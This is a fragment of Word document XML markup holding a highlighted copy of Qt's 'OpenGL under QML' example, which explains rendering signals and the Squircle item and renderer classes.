          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1053" type="#_x0000_t75" alt="" style="width:237.9pt;height:5in">
            <v:imagedata r:id="rId2167" r:href="rId2168"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The OpenGL under QML example shows how an application can make use of the</w:t>
      </w:r>
      <w:r w:rsidR="00993A45" w:rsidRPr="00993A45">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2169" w:anchor="beforeRendering" w:history="1">
        <w:r w:rsidRPr="00993A45">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() signal to draw custom OpenGL content under a Qt Quick scene</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This signal is </w:t>
      </w:r>
      <w:r w:rsidRPr="00993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emitted at the start of every frame</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, before the scene graph starts its rendering, thus any OpenGL draw calls that are made as a response to this signal, will stack under the Qt Quick items.</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As an alternative, applications that wish to render OpenGL content on top of the Qt Quick scene, can do so by connecting to the</w:t>
      </w:r>
      <w:r w:rsidR="00993A45">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2170" w:anchor="afterRendering" w:history="1">
        <w:r w:rsidRPr="00993A45">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::afterRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> signal.</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993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this example</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will also see </w:t>
      </w:r>
      <w:r w:rsidRPr="00993A45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how it is possible to have values that are exposed to QML which affect the OpenGL rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We animate the threshold value using a</w:t>
      </w:r>
      <w:r w:rsidR="00993A45">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2171" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00993A45">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the QML file and this value is used by the OpenGL shader program that draws the squircles.</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class</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public</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QQuickItem</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Q_OBJECT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Q_PROPERTY</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qreal t READ t WRITE setT NOTIFY tChanged</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public</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qreal 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const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return</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m_t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setT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qreal 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signals</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tChanged</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public</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> slots</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sync</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cleanup</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private</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> slots</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handleWindowChanged</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QQuickWindow</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win</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private</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qreal </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m_t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SquircleRenderer</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m_renderer</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">First of all, we need an </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object we can expose to QML</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass of</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2172" w:history="1">
        <w:r w:rsidRPr="004A34D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so we can easily access</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9" w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2173" w:anchor="window" w:history="1">
        <w:r w:rsidRPr="004A34D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::window</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>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class</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SquircleRenderer</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public</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QObject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protected</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QOpenGLFunctions</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Q_OBJECT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public</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SquircleRenderer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m_t</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SquircleRenderer</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setT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qreal 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m_t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setViewportSize</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QSize</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size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m_viewportSize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size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setWindow</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QQuickWindow</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window</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m_window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window</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public</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> slots</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paint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private</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QSize</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_viewportSize</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qreal </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m_t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QOpenGLShaderProgram</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m_program</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QQuickWindow</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m_window</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we need an </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to take care of the rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This instance needs to be separated from the</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9" w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2174" w:history="1">
        <w:r w:rsidRPr="004A34D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004A34D9" w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>because the item lives in the GUI thread and the rendering potentially happens on the render thread</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since </w:t>
      </w:r>
      <w:r w:rsidRPr="004A34D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we want to connect</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="004A34D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2175" w:anchor="beforeRendering" w:history="1">
        <w:r w:rsidRPr="0035792D">
